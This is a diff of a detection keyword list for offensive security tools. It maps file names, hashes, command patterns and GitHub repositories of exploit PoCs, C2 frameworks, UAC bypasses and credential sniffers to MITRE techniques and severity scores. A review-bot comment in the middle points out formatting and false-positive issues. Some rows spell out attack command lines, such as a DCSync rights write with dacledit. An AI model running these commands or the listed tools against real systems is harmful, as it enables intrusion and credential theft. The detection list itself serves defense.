As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cve-20220-26809_exploit.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" -"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cve-2022-23131.py *","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*cve-2022-26809-scanVuln.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-30190-follina-Office-MSDT-Fixed*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" 
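Review bot: In the re-added metasploit rows (`*cve_2019_0708_bluekeep_fail*`, `*cve_2019_0708_bluekeep_pass*`, `*cve_2020_0796_smbghost.*`, `*CVE-2022-21882.x64.dll*`) the technique list reads `T1204 -T1210`, missing the space that the ` - ` separator has everywhere else. A consumer that splits on ` - ` would presumably get one malformed token and lose T1210, so it should read `T1204 - T1210`. Separately, `*CVE_20*.dll*` is scored severity 10 under cobaltstrike but matches any path containing `CVE_20` followed by `.dll`, so a false-positive note in `metadata_comment`, like the one on the interactsh row, would help triage. This hunk only refreshes the star, fork and updated_at columns, so both points are carried over unchanged.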
@@ -9033,9 +9181,9 @@
 "*-d kali-linux *","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*D00MFist/Mystikal*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
 "*D00Movenok/HTMLSmuggler*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z"
-"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
-"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
 "*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
 "*D1rkInject.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
 "*D1rkInject.exe*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
@@ -9050,16 +9198,16 @@
 "*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
 "*d3ckx1/Crack-allDBs*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
 "*d494a4bc-3867-436a-93ef-737f9e0522eb*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
-"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*D4Vinci*","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*DA230B64-14EA-4D49-96E1-FA5EFED9010B*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
-"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*dacledit.py -action write -rights DCSync -principal * -target-dn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*daem0nc0re/PrivFu*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
 "*dafthack/HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z"
-"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
 "*dafthack/MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z"
 "*DallasFR/Cobalt-Clip*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","",""
 "*DallasFR/WinShellcode*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -9070,20 +9218,20 @@
 "*danielmiessler/SecLists.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*DanMcInerney/Empire*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
 "*DanMcInerney/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
-"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1560","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z"
+"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z"
 "*DanMcInerney/theHarvester*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
 "*daphne-main.zip*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z"
 "*daphne-x64 * pid=*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z"
 "*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*darkarmour.py*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z"
 "*darkarmour-master*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z"
-"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z"
+"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z"
 "*darkhotel backdoor*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*DarkHotel C2*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*darkhotel data exfil server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*darkhotel_headers*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
-"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z"
-"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z"
+"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
 "*DarkRCovery.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*DarkWidow-main*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z"
